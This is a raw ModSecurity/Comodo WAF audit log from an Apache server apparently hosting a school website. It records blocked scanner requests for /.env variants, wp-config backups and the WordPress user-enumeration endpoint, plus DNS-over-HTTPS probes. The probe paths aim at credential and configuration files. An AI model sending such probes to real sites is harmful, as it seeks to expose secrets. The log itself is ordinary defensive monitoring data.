Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745356222629014 1075 (- - -)
Stopwatch2: 1745356222629014 1075; combined=534, p1=495, p2=0, p3=0, p4=0, p5=39, sr=166, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--abc1d218-Z--
--377d3c00-A--
[23/Apr/2025:04:54:28 +0700] aAgQFD1ahuoJLEjKiAWrPwAAAI4 103.236.140.4 34600 103.236.140.4 8181
--377d3c00-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 168.63.153.176
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 168.63.153.176
X-Forwarded-Proto: http
Connection: close
Content-Type: text/html; charset=utf-8
--377d3c00-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--377d3c00-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745358868670488 833 (- - -)
Stopwatch2: 1745358868670488 833; combined=295, p1=255, p2=0, p3=0, p4=0, p5=39, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--377d3c00-Z--
--b1ea146f-A--
[23/Apr/2025:07:07:05 +0700] aAgvKBuwXEWV6ydgl530NQAAABA 103.236.140.4 37948 103.236.140.4 8181
--b1ea146f-B--
GET /wp-json/wp/v2/users HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 103.77.107.153
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 103.77.107.153
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.5
--b1ea146f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b1ea146f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745366824997131 3194 (- - -)
Stopwatch2: 1745366824997131 3194; combined=1455, p1=491, p2=933, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b1ea146f-Z--
--a1bbf21f-A--
[23/Apr/2025:07:07:25 +0700] aAgvPRuwXEWV6ydgl530QwAAABM 103.236.140.4 38036 103.236.140.4 8181
--a1bbf21f-B--
GET /wp-config.old HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 185.216.113.180
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 185.216.113.180
X-Forwarded-Proto: http
Connection: close
Accept: */*
--a1bbf21f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a1bbf21f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.old" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745366845986971 907 (- - -)
Stopwatch2: 1745366845986971 907; combined=391, p1=349, p2=0, p3=0, p4=0, p5=42, sr=142, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a1bbf21f-Z--
--be2cff16-A--
[23/Apr/2025:07:36:15 +0700] aAg1_z1ahuoJLEjKiAWy-wAAAIY 103.236.140.4 44988 103.236.140.4 8181
--be2cff16-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 164.90.208.56
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 164.90.208.56
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--be2cff16-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--be2cff16-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745368575508371 744 (- - -)
Stopwatch2: 1745368575508371 744; combined=289, p1=255, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--be2cff16-Z--
--81547b5b-A--
[23/Apr/2025:08:26:40 +0700] aAhB0D1ahuoJLEjKiAW2RQAAAJQ 103.236.140.4 57178 103.236.140.4 8181
--81547b5b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 167.71.65.61
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 167.71.65.61
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--81547b5b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--81547b5b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745371600376386 902 (- - -)
Stopwatch2: 1745371600376386 902; combined=425, p1=371, p2=0, p3=0, p4=0, p5=54, sr=131, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--81547b5b-Z--
--75eaab2b-A--
[23/Apr/2025:10:24:45 +0700] aAhdfT1ahuoJLEjKiAXBBgAAAIk 103.236.140.4 46016 103.236.140.4 8181
--75eaab2b-B--
GET /.env.config HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.161
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.161
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--75eaab2b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--75eaab2b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745378685787804 792 (- - -)
Stopwatch2: 1745378685787804 792; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--75eaab2b-Z--
--e90b2234-A--
[23/Apr/2025:10:24:46 +0700] aAhdfjI97BrbgvDq16TjwQAAANE 103.236.140.4 46018 103.236.140.4 8181
--e90b2234-B--
GET /.env.secret HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.161
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.161
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--e90b2234-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e90b2234-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745378686126646 755 (- - -)
Stopwatch2: 1745378686126646 755; combined=307, p1=272, p2=0, p3=0, p4=0, p5=35, sr=112, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e90b2234-Z--
--fefbc705-A--
[23/Apr/2025:10:24:46 +0700] aAhdfhuwXEWV6ydgl50GXgAAAAk 103.236.140.4 46024 103.236.140.4 8181
--fefbc705-B--
GET /prod/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.161
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.161
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--fefbc705-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fefbc705-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745378686463473 652 (- - -)
Stopwatch2: 1745378686463473 652; combined=258, p1=224, p2=0, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fefbc705-Z--
--16fa4667-A--
[23/Apr/2025:10:24:47 +0700] aAhdfz1ahuoJLEjKiAXBBwAAAIo 103.236.140.4 46030 103.236.140.4 8181
--16fa4667-B--
GET /.env.stage HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.161
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.161
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--16fa4667-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--16fa4667-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745378687486566 673 (- - -)
Stopwatch2: 1745378687486566 673; combined=267, p1=234, p2=0, p3=0, p4=0, p5=33, sr=68, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--16fa4667-Z--
--8b337d48-A--
[23/Apr/2025:10:24:48 +0700] aAhdgD1ahuoJLEjKiAXBCAAAAJE 103.236.140.4 46032 103.236.140.4 8181
--8b337d48-B--
GET /.env.template HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.161
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.161
X-Forwarded-Proto: http
Connection: close
User-Agent: l9explore/1.2.2
--8b337d48-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8b337d48-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745378688160663 630 (- - -)
Stopwatch2: 1745378688160663 630; combined=254, p1=222, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8b337d48-Z--
--6564da54-A--
[23/Apr/2025:12:27:15 +0700] aAh6MxuwXEWV6ydgl50THAAAAAQ 103.236.140.4 35532 103.236.140.4 8181
--6564da54-B--
GET /wp-config.php.backup HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 108.167.189.34
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 108.167.189.34
X-Forwarded-Proto: http
Connection: close
Accept: */*
--6564da54-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6564da54-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745386035804852 1205 (- - -)
Stopwatch2: 1745386035804852 1205; combined=372, p1=328, p2=0, p3=0, p4=0, p5=44, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6564da54-Z--
--cf314c51-A--
[23/Apr/2025:13:03:17 +0700] aAiCpRuwXEWV6ydgl50WFQAAABI 103.236.140.4 45206 103.236.140.4 8181
--cf314c51-B--
GET /wp-config.backup HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 89.46.105.243
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 89.46.105.243
X-Forwarded-Proto: http
Connection: close
Accept: */*
--cf314c51-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cf314c51-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745388197048577 3487 (- - -)
Stopwatch2: 1745388197048577 3487; combined=1534, p1=675, p2=824, p3=0, p4=0, p5=34, sr=143, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cf314c51-Z--
--c606dc30-A--
[23/Apr/2025:14:56:24 +0700] aAidKD1ahuoJLEjKiAXSbwAAAIk 103.236.140.4 45174 103.236.140.4 8181
--c606dc30-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 109.70.100.6
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 109.70.100.6
X-Forwarded-Proto: https
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
--c606dc30-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c606dc30-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745394984147430 2125 (- - -)
Stopwatch2: 1745394984147430 2125; combined=979, p1=328, p2=596, p3=0, p4=0, p5=54, sr=68, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c606dc30-Z--
--10724e09-A--
[23/Apr/2025:15:21:06 +0700] aAii8tIw_rqnm4P5_adj9AAAAE8 103.236.140.4 51324 103.236.140.4 8181
--10724e09-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.227.231.159
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.227.231.159
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--10724e09-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--10724e09-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745396466493198 690 (- - -)
Stopwatch2: 1745396466493198 690; combined=304, p1=272, p2=0, p3=0, p4=0, p5=32, sr=62, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--10724e09-Z--
--eb3bc210-A--
[23/Apr/2025:15:33:16 +0700] aAilzD1ahuoJLEjKiAXVPQAAAI0 103.236.140.4 54400 103.236.140.4 8181
--eb3bc210-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--eb3bc210-C--
7Í examplecom
--eb3bc210-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--eb3bc210-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745397196644341 3106 (- - -)
Stopwatch2: 1745397196644341 3106; combined=1912, p1=490, p2=1346, p3=17, p4=20, p5=39, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--eb3bc210-Z--
--68cc7934-A--
[23/Apr/2025:15:33:16 +0700] aAilzDI97BrbgvDq16T94wAAAM0 103.236.140.4 54406 103.236.140.4 8181
--68cc7934-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--68cc7934-C--
i examplecom
--68cc7934-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--68cc7934-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745397196936999 3084 (- - -)
Stopwatch2: 1745397196936999 3084; combined=2077, p1=451, p2=1559, p3=19, p4=23, p5=25, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--68cc7934-Z--
--1fc92733-A--
[23/Apr/2025:15:33:17 +0700] aAilzTI97BrbgvDq16T95AAAAM4 103.236.140.4 54416 103.236.140.4 8181
--1fc92733-B--
POST /query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--1fc92733-C--
š$ examplecom
--1fc92733-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1fc92733-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745397197235753 3445 (- - -)
Stopwatch2: 1745397197235753 3445; combined=2232, p1=443, p2=1711, p3=24, p4=27, p5=27, sr=60, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1fc92733-Z--
--5247817c-A--
[23/Apr/2025:15:33:17 +0700] aAilzT1ahuoJLEjKiAXVQAAAAI4 103.236.140.4 54422 103.236.140.4 8181
--5247817c-B--
POST /query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--5247817c-C--
0 examplecom
--5247817c-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5247817c-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745397197529577 3242 (- - -)
Stopwatch2: 1745397197529577 3242; combined=2123, p1=505, p2=1551, p3=19, p4=23, p5=25, sr=108, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5247817c-Z--
--d9b1db24-A--
[23/Apr/2025:15:33:17 +0700] aAilzT1ahuoJLEjKiAXVQQAAAJM 103.236.140.4 54428 103.236.140.4 8181
--d9b1db24-B--
POST /resolve HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--d9b1db24-C--
}K examplecom
--d9b1db24-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d9b1db24-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745397197821265 2576 (- - -)
Stopwatch2: 1745397197821265 2576; combined=1713, p1=326, p2=1334, p3=16, p4=18, p5=19, sr=53, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d9b1db24-Z--
--d3772b7b-A--
[23/Apr/2025:15:33:18 +0700] aAilzj1ahuoJLEjKiAXVQgAAAJE 103.236.140.4 54434 103.236.140.4 8181
--d3772b7b-B--
POST /resolve HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
